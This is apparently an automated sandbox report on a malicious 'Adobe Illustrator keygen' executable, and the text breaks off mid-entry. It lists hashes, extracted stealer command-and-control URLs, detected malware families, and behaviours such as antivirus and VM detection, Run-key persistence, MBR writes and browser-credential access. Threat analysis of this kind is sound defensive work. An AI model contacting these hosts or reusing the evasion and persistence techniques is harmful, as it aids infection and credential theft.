Analysis
-
max time kernel
72s -
max time network
153s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
09-03-2021 14:25
Static task
static1
Behavioral task
behavioral1
Sample
adobe_illustrator_keygen_by_KeygenNinja.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
adobe_illustrator_keygen_by_KeygenNinja.exe
Resource
win10v20201028
General
-
Target
adobe_illustrator_keygen_by_KeygenNinja.exe
-
Size
8.2MB
-
MD5
9d138fc7214e3406cfc203e4922ab3ac
-
SHA1
3ec42683d6cd31870a54991386d2ca596f9cdeff
-
SHA256
ec624715737071e22af8152d2170cb7a04217b3815a00302ff6f534994a7a97b
-
SHA512
06414e7259ef270ebb668fcb628ee25e3cb265b64b5baba8fc842c45b8e31cb88cea4934b420cb27e7849ee87e62172b44416fff46ab43b5cd4be24dd6048f8b
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
raccoon
51c194bfb6e404af0e5ff0b93b443907a6a845b1
-
url4cnc
https://telete.in/h_focus_1
Extracted
metasploit
windows/single_exec
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/6524-405-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral2/memory/6524-406-0x00000000039A0000-0x00000000041FD000-memory.dmp family_glupteba behavioral2/memory/6524-408-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral2/memory/4696-201-0x0000000004950000-0x0000000004976000-memory.dmp family_redline behavioral2/memory/4696-197-0x00000000020F0000-0x0000000002118000-memory.dmp family_redline behavioral2/memory/5660-311-0x0000000000400000-0x0000000000426000-memory.dmp family_redline behavioral2/memory/448-372-0x0000000000400000-0x0000000000428000-memory.dmp family_redline -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Modifies boot configuration data using bcdedit 15 IoCs
pid Process 188 bcdedit.exe 4716 bcdedit.exe 5268 bcdedit.exe 6528 bcdedit.exe 6708 bcdedit.exe 5420 bcdedit.exe 4672 bcdedit.exe 5708 bcdedit.exe 3300 bcdedit.exe 5324 bcdedit.exe 6684 bcdedit.exe 5720 bcdedit.exe 6980 bcdedit.exe 5176 bcdedit.exe 5772 bcdedit.exe -
Nirsoft 6 IoCs
resource yara_rule behavioral2/files/0x0005000000000697-55.dat Nirsoft behavioral2/files/0x0005000000000697-56.dat Nirsoft behavioral2/files/0x000100000001abba-79.dat Nirsoft behavioral2/files/0x000100000001abba-80.dat Nirsoft behavioral2/files/0x000100000001abc5-115.dat Nirsoft behavioral2/files/0x000100000001abc5-116.dat Nirsoft -
Blocklisted process makes network request 2 IoCs
flow pid Process 120 4756 powershell.exe 123 3052 powershell.exe -
Executes dropped EXE 52 IoCs
pid Process 3936 keygen-pr.exe 1368 keygen-step-1.exe 1548 keygen-step-3.exe 3212 keygen-step-4.exe 2628 key.exe 3468 Setup.exe 2084 AD754B4D3FE2C4EE.exe 3884 AD754B4D3FE2C4EE.exe 208 askinstall20.exe 4380 1615300158282.exe 4412 Install.exe 4548 multitimer.exe 4608 md2_2efs.exe 2448 1615300163140.exe 4204 file.exe 4300 multitimer.exe 4620 multitimer.exe 4104 1615300168374.exe 4480 197.tmp.exe 4492 37C.tmp.exe 4724 197.tmp.exe 4992 3zghjt3qmqe.exe 5036 3zghjt3qmqe.tmp 1096 vpn.exe 4244 askinstall24.exe 4200 chqta5qgtz3.exe 4232 chashepro3.exe 4648 so1y2dml4mg.exe 5084 IBInstaller_97039.exe 4344 vict.exe 4636 chashepro3.tmp 4348 vpn.tmp 224 dxial0iierr.exe 3472 IBInstaller_97039.tmp 3636 vict.tmp 4696 Brava.exe 4708 Venita.exe 4876 mex.exe 4484 chrome_proxy.exe 5232 BTRSetp.exe 5736 winlthst.exe 5780 ThunderFW.exe 5800 app.exe 5848 wimapi.exe 6084 2oo0xwkdvse.exe 6112 2oo0xwkdvse.tmp 6140 06NZJ10HT.exe 5096 6375841.70 4520 6846628.75 5560 5061240.55 3948 gcttt.exe 5660 37C.tmp.exe -
Looks for VMWare Tools registry key 2 TTPs
-
Modifies Windows Firewall 1 TTPs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
resource yara_rule behavioral2/files/0x000100000001ab8b-29.dat office_xlm_macros -
resource yara_rule behavioral2/memory/6912-448-0x0000000000400000-0x0000000000897000-memory.dmp upx -
Loads dropped DLL 19 IoCs
pid Process 3940 MsiExec.exe 5036 3zghjt3qmqe.tmp 4348 vpn.tmp 4348 vpn.tmp 3472 IBInstaller_97039.tmp 3636 vict.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 4348 vpn.tmp 6112 2oo0xwkdvse.tmp 6112 2oo0xwkdvse.tmp 6112 2oo0xwkdvse.tmp 6112 2oo0xwkdvse.tmp 6112 2oo0xwkdvse.tmp 6112 2oo0xwkdvse.tmp 6112 2oo0xwkdvse.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe" 6846628.75 Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" gcttt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\po1v3331wkb = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\5CSM0HTZD2\\multitimer.exe\" 1 3.1615299952.6047857028a05" multitimer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\5252955 = "\"C:\\Users\\Admin\\AppData\\Roaming\\zey1h4bwsk5\\2oo0xwkdvse.exe\" /VERYSILENT" 2oo0xwkdvse.tmp Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\6GZ7JQK8X2686WP = "\"C:\\Program Files\\06NZJ10HT4\\06NZJ10HT.exe\"" 06NZJ10HT.exe -
Checks for any installed AV software in registry 1 TTPs 53 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 64 api.ipify.org 131 ip-api.com 157 checkip.amazonaws.com 248 api.ipify.org -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 Setup.exe File opened for modification \??\PhysicalDrive0 AD754B4D3FE2C4EE.exe File opened for modification \??\PhysicalDrive0 AD754B4D3FE2C4EE.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3468 Setup.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2084 set thread context of 4284 2084 AD754B4D3FE2C4EE.exe 106 PID 2084 set thread context of 4288 2084 AD754B4D3FE2C4EE.exe 116 PID 2084 set thread context of 4516 2084 AD754B4D3FE2C4EE.exe 121 PID 4480 set thread context of 4724 4480 197.tmp.exe 125 PID 4492 set thread context of 5660 4492 37C.tmp.exe 185 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-VGJRO.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-FNT50.tmp vpn.tmp File created C:\Program Files (x86)\viewerise\is-9I0M4.tmp 3zghjt3qmqe.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-DUNDI.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-PMCND.tmp vpn.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\am805.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-NU0GM.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-63MAG.tmp vpn.tmp File opened for modification C:\Program Files (x86)\viewerise\unins000.dat 3zghjt3qmqe.tmp File opened for modification C:\Program Files (x86)\JCleaner\mex.exe chashepro3.tmp File created C:\Program Files (x86)\JCleaner\is-87KPH.tmp chashepro3.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-PNBN7.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-9KC6T.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-GUTQS.tmp vpn.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-QV0OF.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-MNLU4.tmp IBInstaller_97039.tmp File created C:\Program Files\06NZJ10HT4\uninstaller.exe dxial0iierr.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-KI8T6.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-7KLR1.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll vpn.tmp File created C:\Program Files (x86)\viewerise\is-KAVRK.tmp vict.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-EGV0A.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-VBHSM.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg vpn.tmp File created C:\Program Files (x86)\gdiview\gdiview\GDIView.chm msiexec.exe File opened for modification C:\Program Files (x86)\JCleaner\Venita.exe chashepro3.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Globalization.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-KQ8JH.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-C1L9R.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-2126P.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-RNDL2.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-CHKBG.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-1BPG2.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-1NLUH.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-S5VR0.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-MBECQ.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-IIMFH.tmp vpn.tmp File created C:\Program Files (x86)\gdiview\gdiview\GDIView.exe msiexec.exe File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-3EB0C.tmp vpn.tmp File created C:\Program Files (x86)\JCleaner\unins000.dat chashepro3.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-5EB3A.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-6UJGH.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-Q2NP6.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-JE57B.tmp vpn.tmp File opened for modification C:\Program Files (x86)\JCleaner\Brava.exe chashepro3.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-E0HOJ.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Delphi.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Refactoring.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-M6KUQ.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-O2CC5.tmp vpn.tmp File created C:\Program Files (x86)\JCleaner\is-B8QEV.tmp chashepro3.tmp File created C:\Program Files (x86)\MaskVPN\is-62JO0.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-MLP34.tmp vpn.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Interop.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\ssleay32.dll vpn.tmp -
Drops file in Windows directory 10 IoCs
description ioc Process File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\f75286a.msi msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Installer\f752868.msi msiexec.exe File opened for modification C:\Windows\Installer\f752868.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{9A2A452C-3057-4F5E-8C7F-41B0D566B831} msiexec.exe File opened for modification C:\Windows\Installer\MSI41AD.tmp msiexec.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 AD754B4D3FE2C4EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc AD754B4D3FE2C4EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName AD754B4D3FE2C4EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key value queried 